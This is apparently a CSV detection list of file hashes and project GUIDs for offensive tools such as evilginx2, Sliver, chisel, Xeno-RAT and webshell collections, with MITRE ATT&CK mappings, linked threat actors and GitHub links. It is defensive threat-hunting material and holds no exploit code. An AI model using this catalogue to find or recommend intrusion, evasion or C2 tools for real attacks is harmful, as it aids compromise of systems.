"*f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36*",".{0,1000}f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44048"
"*f5b50fa27059710ba9910381fd2fd8dc9c95f2e519e0079bdd1ce34794f60d5c*",".{0,1000}f5b50fa27059710ba9910381fd2fd8dc9c95f2e519e0079bdd1ce34794f60d5c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44051"
"*f5b5f4793e80983d49568616bd41f6068e6e6543e258fc4064d090956d124fc3*",".{0,1000}f5b5f4793e80983d49568616bd41f6068e6e6543e258fc4064d090956d124fc3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44052"
"*f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b*",".{0,1000}f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44053"
"*f5b818bbd0a230ab8f0e533b563f678ec774216f4d06e4cc90d0e2e61167eb57*",".{0,1000}f5b818bbd0a230ab8f0e533b563f678ec774216f4d06e4cc90d0e2e61167eb57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44054"
"*f5b82c817528c03e5b0e21c61b07cfba0bb80b9b7e86e12af5b39a2c47e708f7*",".{0,1000}f5b82c817528c03e5b0e21c61b07cfba0bb80b9b7e86e12af5b39a2c47e708f7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44055"
"*F5B94815-D623-4947-9A2B-88ABAF7FA6D9*",".{0,1000}F5B94815\-D623\-4947\-9A2B\-88ABAF7FA6D9.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","44056"
"*F5BFA34B-3CDE-4C77-9162-96666303FDEA*",".{0,1000}F5BFA34B\-3CDE\-4C77\-9162\-96666303FDEA.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","44058"
"*F5BIG-Scanner.py*",".{0,1000}F5BIG\-Scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","N/A","1","5","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z","44059"
"*f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e*",".{0,1000}f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","44061"
"*f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da*",".{0,1000}f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44063"
"*f5d083622d36be251b6826886fd98b56b573e260db0e113510afcc648886f104*",".{0,1000}f5d083622d36be251b6826886fd98b56b573e260db0e113510afcc648886f104.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44064"
"*f5d12a78dbb405e8dc7b1238ca6825e4f68200cb8aefe56b398957d0ba1d0bcc*",".{0,1000}f5d12a78dbb405e8dc7b1238ca6825e4f68200cb8aefe56b398957d0ba1d0bcc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44065"
"*f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c*",".{0,1000}f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44067"
"*f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912*",".{0,1000}f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44069"
"*f5e88366bd0d54ec11ea8332379c570a7d796b1f1bcc3db74d016da1367725ef*",".{0,1000}f5e88366bd0d54ec11ea8332379c570a7d796b1f1bcc3db74d016da1367725ef.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44070"
"*f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7*",".{0,1000}f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44072"
"*f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414*",".{0,1000}f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44073"
"*F5F605F596F85A1344F46774D782F4109EA83DD851139338CB07DF90FD1D0D5A*",".{0,1000}F5F605F596F85A1344F46774D782F4109EA83DD851139338CB07DF90FD1D0D5A.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44075"
"*f5fe991e9809b076b41cbda446dda964392f3666a86b87cdb8bf4c8be90040ba*",".{0,1000}f5fe991e9809b076b41cbda446dda964392f3666a86b87cdb8bf4c8be90040ba.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44076"
"*F602DAFE-E8A2-4CB2-AF0E-656CD357D821*",".{0,1000}F602DAFE\-E8A2\-4CB2\-AF0E\-656CD357D821.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44077"
"*f606ecc982d3bcbf1ec4651a183d542891fc325f9099ba0e802aa6926abef724*",".{0,1000}f606ecc982d3bcbf1ec4651a183d542891fc325f9099ba0e802aa6926abef724.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44078"
"*F60C3246-D449-412B-A858-3B5E84494D1A*",".{0,1000}F60C3246\-D449\-412B\-A858\-3B5E84494D1A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","44080"
"*f60e242e57d4caa8a918f9809f9a8ded3ad0f05d35be96e4ec1ad366dec0a393*",".{0,1000}f60e242e57d4caa8a918f9809f9a8ded3ad0f05d35be96e4ec1ad366dec0a393.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44082"
"*f6192766029db752408501c6333685fdacc0d4d308222bdea9f6c3c5dd9b31de*",".{0,1000}f6192766029db752408501c6333685fdacc0d4d308222bdea9f6c3c5dd9b31de.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44083"
"*f61d03ebf3e6025c457cde531e636b9258ac690ceaae48c5ffb95c37749d1b03*",".{0,1000}f61d03ebf3e6025c457cde531e636b9258ac690ceaae48c5ffb95c37749d1b03.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44084"
"*f61d22d8e8130ff6be2aaf36e1ac8103af3b375549d453deddedb19606751190*",".{0,1000}f61d22d8e8130ff6be2aaf36e1ac8103af3b375549d453deddedb19606751190.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44085"
"*f61ebc6c8692c620a57b7b167206e74131df5e4d651ae55713392bde4b0e8b9f*",".{0,1000}f61ebc6c8692c620a57b7b167206e74131df5e4d651ae55713392bde4b0e8b9f.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","44086"
"*F61EEB46-5352-4349-B880-E4A0B38EC0DB*",".{0,1000}F61EEB46\-5352\-4349\-B880\-E4A0B38EC0DB.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","44087"
"*f630a53430993faf0efc789c5e00680c3c2e83883e44a93565752a4f490dd41d*",".{0,1000}f630a53430993faf0efc789c5e00680c3c2e83883e44a93565752a4f490dd41d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44088"
"*f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf*",".{0,1000}f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44089"
"*f632fb93b89b788f346784f9e18976a2a116bfd67bfd740feb5dc61c06141e29*",".{0,1000}f632fb93b89b788f346784f9e18976a2a116bfd67bfd740feb5dc61c06141e29.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44090"
"*f63567b66d159c784dd72daab73acf100c3025481b22260980a87d5efdc5a6eb*",".{0,1000}f63567b66d159c784dd72daab73acf100c3025481b22260980a87d5efdc5a6eb.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44092"
"*f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c*",".{0,1000}f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44094"
"*f63b78ec533b0b101033c9b5268933e0d788720388b136ce10ce83c9ee02fcf4*",".{0,1000}f63b78ec533b0b101033c9b5268933e0d788720388b136ce10ce83c9ee02fcf4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44096"
"*f63c29ce8df84e2f6aecfcdd4338ade69d0bca92dd92e45b7373030cfe7539c0*",".{0,1000}f63c29ce8df84e2f6aecfcdd4338ade69d0bca92dd92e45b7373030cfe7539c0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44097"
"*f65740929e9608e0590eee78f1ba20793d99163ac5f6dc1c8b8734b742c4da11*",".{0,1000}f65740929e9608e0590eee78f1ba20793d99163ac5f6dc1c8b8734b742c4da11.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#filehash","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","44103"
"*f66678009d2d605438bb2b8308cbce9b05aeb25a63785c228e30b52c8e43af75*",".{0,1000}f66678009d2d605438bb2b8308cbce9b05aeb25a63785c228e30b52c8e43af75.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44104"
"*f666dbab003b377019955f3f304ac68c9af5defd5e05a39e916e7af8ad9076c1*",".{0,1000}f666dbab003b377019955f3f304ac68c9af5defd5e05a39e916e7af8ad9076c1.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44105"
"*f66f7bfa92e6106e77dba36fd345df2bb84a4cf9b798076e979b1b61bab53f1c*",".{0,1000}f66f7bfa92e6106e77dba36fd345df2bb84a4cf9b798076e979b1b61bab53f1c.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44109"
"*f67880e200d99b83404108e9a563c7f97eda8ac8c3fff08dc065d8734cfa57a1*",".{0,1000}f67880e200d99b83404108e9a563c7f97eda8ac8c3fff08dc065d8734cfa57a1.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","44110"
"*f67a3d9c0c161cb273819ff6fe64f8aa45195590d8f46e7dd91433a461c4dba3*",".{0,1000}f67a3d9c0c161cb273819ff6fe64f8aa45195590d8f46e7dd91433a461c4dba3.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44111"
"*f67a93fa0870a0ef178d165eb20fb77d60c1a87e5b82851c63aad115ffe90bd4*",".{0,1000}f67a93fa0870a0ef178d165eb20fb77d60c1a87e5b82851c63aad115ffe90bd4.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44112"
"*f67dd8a803b6a71f7e13d8d0c8d6bb07de34a401f5fc966c157fc46e1c2a557c*",".{0,1000}f67dd8a803b6a71f7e13d8d0c8d6bb07de34a401f5fc966c157fc46e1c2a557c.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","44113"
"*f680df97c02b27fad2add251018194bffa1c47c765cb6c87a79ad07294bb0551*",".{0,1000}f680df97c02b27fad2add251018194bffa1c47c765cb6c87a79ad07294bb0551.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44114"
"*f6888c1406e2b3549c9bc11929595170d3a74b0d4968f603cc33f9a896a53a95*",".{0,1000}f6888c1406e2b3549c9bc11929595170d3a74b0d4968f603cc33f9a896a53a95.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","44116"
"*f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974*",".{0,1000}f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44117"
"*f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4*",".{0,1000}f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44118"
"*f691703db162bafdc2682f60af4484a7413f6c0d39916fd7ae0469a132aec34d*",".{0,1000}f691703db162bafdc2682f60af4484a7413f6c0d39916fd7ae0469a132aec34d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44119"
